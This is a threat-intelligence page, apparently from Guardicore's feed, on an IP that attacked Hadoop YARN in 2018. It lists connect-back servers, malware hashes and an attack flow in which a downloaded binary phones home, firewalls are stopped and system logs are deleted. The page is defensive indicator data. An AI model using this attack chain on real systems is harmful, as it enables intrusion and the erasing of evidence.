IP Address: 206.189.182.1Previously Malicious

Weekly Summary

Browse or download a weekly review of our cyber threat intelligence data and gain more insight to help protect your network

Top Threats

Cyber Threat Intelligence

Discover Malicious IPs and Domains with Guardicore Cyber Threat Feed

IP Address:
206.189.182.1​
Previously Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker

Services Targeted

HadoopYARN

Tags

HTTP Log Tampering HadoopYARN Malicious File IDS - Web Application Attack Outgoing Connection Download and Allow Execution Download and Execute Access Suspicious Domain Download File Inbound HTTP Request Service Stop

Connect Back Servers

steck.cc

104.46.40.157 52.174.52.111 13.92.238.45 13.81.222.239 40.87.71.177 52.173.83.168 40.71.227.128 23.101.128.211 40.71.192.77 46.101.229.141 40.112.57.175 13.95.80.40 52.186.125.0 13.94.211.122 52.178.117.234 52.179.125.15 52.166.121.133 104.41.149.18 52.232.33.74 40.117.44.182 52.173.243.215 40.117.238.114 13.93.93.21 52.233.179.93 52.173.80.33 13.73.167.164 52.166.206.33 52.233.143.163 40.114.243.66 40.69.187.176

Basic Information

IP Address

206.189.182.1

Domain

-

ISP

DigitalOcean, LLC

Country

United States

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2018-10-07

Last seen in Guardicore Centra

2018-11-01

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

Process /usr/bin/wget generated outgoing network traffic to: steck.cc:80

Outgoing Connection

Process /usr/bin/wget attempted to access suspicious domains: steck.cc

Access Suspicious Domain Outgoing Connection

IDS detected Web Application Attack : 401TRG Generic Webshell Request - POST with wget in body

IDS - Web Application Attack

The file /tmp/Trio.x86 was downloaded and executed 387 times

Download and Execute

Process /tmp/Trio.x86 generated outgoing network traffic to: steck.cc:23 and 81.4.101.221:23

Outgoing Connection

Process /tmp/Trio.x86 attempted to access suspicious domains: steck.cc

Access Suspicious Domain Outgoing Connection

Service iptables was stopped 31 times

Service Stop

Service firewalld was stopped 31 times

Service Stop

Log File Tampering detected from /bin/rm on the following logs: /var/log/apt/apt.log, /var/log/dmesg, /var/log/faillog, /var/log/mysql/mysql_error.log, /var/log/dpkg.log, /var/log/apt/term.log, /var/log/apt/history.log, /var/log/alternatives.log, /var/log/btmp, /var/log/fsck/checkroot, /var/log/lastlog, /var/log/wtmp, /var/log/bootstrap.log and /var/log/fsck/checkfs

Log Tampering

The file /bin/rm was downloaded and executed 2 times

Download and Execute

The file /usr/local/bin/dash was downloaded and executed 2 times

Download and Execute

The file /usr/bin/pgrep was downloaded and executed

Download and Execute

The file /sbin/xtables-multi was downloaded and executed

Download and Execute

Connection was closed due to timeout

/tmp/Trio.x86 was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

Associated Files

/tmp/Trio.x86

SHA256: fa50ae9fd97a8254ded0f083256201d996795de774915e815d6bcdccfcd42647

11677 bytes

/tmp/hoho.x86.8

SHA256: dbb4593d02f3e0099507f4f72d4cf373f33ccc5bc0fa49c47ddf8d702b3263fb

11679 bytes

/tmp/TrioSec.x86

SHA256: 4afbb25a82cf8909f7d8b24484aaa272c442077b3dc73664a47b6a2c87e501ed

99157 bytes

/tmp/TrioSec.x86

SHA256: b8eca9942a81158fef96f0a81789957586ab249c2e1c8f408f20ad8f7f9eb3f3

11680 bytes

/tmp/TrioSec.x86

SHA256: 17eab3ffcf12eda9414b81f52a774df18bbaafe3eb4ff76b58f1c88c52d5db43

27616 bytes

/tmp/TrioSec.x86

SHA256: e08e53630f06e8c0ca4dc40fff575d0634314f6848fbe8133a49f71f3dd10d56

56832 bytes

/tmp/Trio.x86

SHA256: 01ad20e86e33007f8c35918448408c77b182492686e40c6b27823e55d45aa728

108742 bytes

/tmp/Trio.x86

SHA256: 4e3fffe6d79623b03eee5457095683937965cee8400c427c669bec985d89ad68

99125 bytes

/tmp/Trio.x86

SHA256: 9aa86f35c6437818c01d845feb1e5985f4f060a598ab33b84c561f848c334c1c

26286 bytes

/tmp/Trio.x86

SHA256: 0e2fbd9812a4183bb8c9983142b71e67e4016d6daabf52af1983f70c85c11a72

13006 bytes

/tmp/TrioSec.x86

SHA256: ce71a21a1c246280ab3a29f2dc44f94dd99a79f6bb26896811629b4ea5a4b797

108742 bytes

/tmp/TrioSec.x86

SHA256: 363008e80a93570aef53330df853fd3bc381fdb68b6ec2fb37b7e091f9194740

35584 bytes

/tmp/TrioSec.x86

SHA256: e0d8516855a04c72f4fc9ff5619c09b2234eaac1ebbc55b6ca639e9d18d0e10f

71440 bytes

/tmp/TrioSec.x86

SHA256: 74cab63a3b0fbc79a1dd47a064aa7e0774e332c413c50ee3ff5b2223e87367af

91360 bytes

/tmp/TrioSec.x86

SHA256: 808891a08fa9e42e87052dd89cfcdf957f1324da5d00997a83d083a77d367836

26288 bytes

/tmp/TrioSec.x86

SHA256: 2cbd9a263d675b6b447311576f0298cd3197cfe20c0521810cbbeb012156415e

96672 bytes

Oops! - Do you see your IP here? Contact us at labs@guardicore.com to remove it from the Threat Intelligence data.

IP Address: 206.189.182.1​Previously Malicious